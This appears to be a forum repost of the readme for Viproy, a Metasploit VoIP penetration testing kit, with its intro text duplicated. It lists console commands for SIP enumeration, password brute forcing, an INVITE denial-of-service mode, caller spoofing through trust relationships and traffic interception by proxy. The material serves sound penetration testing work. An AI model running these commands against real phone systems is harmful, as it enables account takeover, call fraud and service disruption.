Search the Community

Viproy - VoIP Penetration Testing Kit Project Page : http://www.github.com/fozavci/viproy-voipkit Download : https://github.com/fozavci/viproy-voipkit/archive/master.zip Viproy Voip Pen-Test Kit is developed to improve quality of SIP Penetration Tests. It provides authentication feature that helps to create simple tests. It includes 7 different modules with authentication support: options tester, brute forcer, enumerator, invite tester, trust analyzer, proxy and registration tester. All attacks could perform before and after authentication to fuzz SIP services and value added services. SIP Pen-test guide will be published soon. Basic Usage of Modules are presented below, it can be used before guide. All modules have DEBUG and VERBOSE supports Preparing Test Network VulnVOIP is vulnerable SIP server, you can use it for tests VulnVOIP : VulnVoIP Archives - Rebootuser Installation Copy "lib" and "modules" folders' content to Metasploit Root Directory. Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) Should Contain This Line require 'msf/core/auxiliary/sip' Videos & Papers Attacking SIP/VoIP Servers Using VIPROY VoIP Pen-Test Kit for Fun & Profit - Video (50 mins) This is a training video for penetration testing of SIP servers. Chapters of Training Video 1-Footprinting of SIP Services 2-Enumerating SIP Services 3-Registering SIP Service with/without Credentials 4-Brute Force Attack for SIP Service 5-Call Initiation with/without Spoof & Credentials 6-Hacking Trust Relationships 7-Intercepting SIP Client with SIP Proxy Viproy - VoIP Penetration Testing Kit Project Page : http://www.github.com/fozavci/viproy-voipkit Download : https://github.com/fozavci/viproy-voipkit/archive/master.zip Viproy Voip Pen-Test Kit is developed to improve quality of SIP Penetration Tests. It provides authentication feature that helps to create simple tests. It includes 7 different modules with authentication support: options tester, brute forcer, enumerator, invite tester, trust analyzer, proxy and registration tester. All attacks could perform before and after authentication to fuzz SIP services and value added services. SIP Pen-test guide will be published soon. Basic Usage of Modules are presented below, it can be used before guide. All modules have DEBUG and VERBOSE supports Preparing Test Network VulnVOIP is vulnerable SIP server, you can use it for tests VulnVOIP : VulnVoIP Archives - Rebootuser Installation Copy "lib" and "modules" folders' content to Metasploit Root Directory. Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) Should Contain This Line require 'msf/core/auxiliary/sip' Videos & Papers Attacking SIP/VoIP Servers Using VIPROY VoIP Pen-Test Kit for Fun & Profit - Video (50 mins) This is a training video for penetration testing of SIP servers. Chapters of Training Video 1-Footprinting of SIP Services 2-Enumerating SIP Services 3-Registering SIP Service with/without Credentials 4-Brute Force Attack for SIP Service 5-Call Initiation with/without Spoof & Credentials 6-Hacking Trust Relationships 7-Intercepting SIP Client with SIP Proxy Sample Usage Video Hacking Trust Relationships of SIP/NGN Gateways - Video Hacking Trust Relationships Between SIP Gateways (PDF) http://viproy.com/files/siptrust.pdf Usage Global Settings setg CHOST 192.168.1.99 #Local Host setg CPORT 5099 #Local Port setg RHOSTS 192.168.1.1-254 #Target Network setg RHOST 192.168.1.201 #Target Host Basic Usage of OPTIONS Module use auxiliary/scanner/sip/vsipoptions show options set THREADS 255 run Basic Usage of REGISTER Module use auxiliary/scanner/sip/vsipregister show options run set LOGIN true set USERNAME 101 set PASSWORD s3cur3 run Basic Usage of INVITE Module use auxiliary/scanner/sip/vsipinvite set FROM 2000 set TO 1000 run set LOGIN true set FROM 102 set USERNAME 102 set PASSWORD letmein123 run set DOS_MODE true set NUMERIC_USERS true set NUMERIC_MIN 200 set NUMERIC_MAX 205 run Basic Usage of ENUMERATOR Module use auxiliary/scanner/sip/vsipenumerator show options unset USERNAME set USER_FILE /tmp/files/users2 set VERBOSE false set METHOD SUBSCRIBE run unset USER_FILE set METHOD SUBSCRIBE set NUMERIC_USERS true set NUMERIC_MAX 2300 run set METHOD REGISTER run Basic Usage of BRUTE FORCE Module use auxiliary/scanner/sip/vsipbruteforce show options set RHOST 192.168.1.201 set USERNAME 2000 set PASS_FILE /tmp/files/passwords set VERBOSE false run unset USERNAME set USER_FILE /tmp/files/users2 run unset USER_FILE set NUMERIC_USERS true set NUMERIC_MAX 500 run Basic Usage of Trust Analyzer Module use auxiliary/scanner/sip/vsiptrust show options set SRC_RHOSTS 192.168.1.200-210 set SRC_RPORTS 5060 set SIP_SERVER 192.168.1.201 set INTERFACE eth0 set TO 101 run show options set ACTION CALL set SRC_RHOSTS 192.168.1.202 set FROM James Bond run Basic Usage of SIP Proxy Module use auxiliary/scanner/sip/vsipproxy show options set PRXCLT_PORT 5060 set PRXCLT_IP 192.168.1.99 set PRXSRV_PORT 5089 set PRXSRV_IP 192.168.1.99 set CLIENT_IP 192.168.1.120 set CLIENT_PORT 5060 set SERVER_IP 192.168.1.201 set SERVER_PORT 5060 set CONF_FILE /tmp/sipproxy_replace.txt set LOG true set VERBOSE false run Source Viproy - Tools